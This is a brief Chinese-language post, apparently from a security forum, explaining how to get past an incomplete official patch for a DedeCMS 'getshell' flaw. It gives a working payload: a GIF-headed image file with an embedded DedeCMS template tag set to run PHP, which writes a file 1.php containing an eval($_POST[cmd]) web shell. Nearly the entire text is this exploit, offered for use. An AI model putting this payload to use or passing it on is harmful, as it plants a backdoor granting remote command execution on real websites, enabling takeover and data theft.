还是上次的那个dede getshell 漏洞 ，只不过官方的补丁没有补到位。

现在其基础上，修改图片代码实现最新版本补丁突破。
找一张图片，在保留图片代码的同时，插入如下代码

GIF89aGIF89a {dede:name runphp='yes'}
$fp = @fopen("1.php", 'a');
@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
@fclose($fp);
{/dede:name}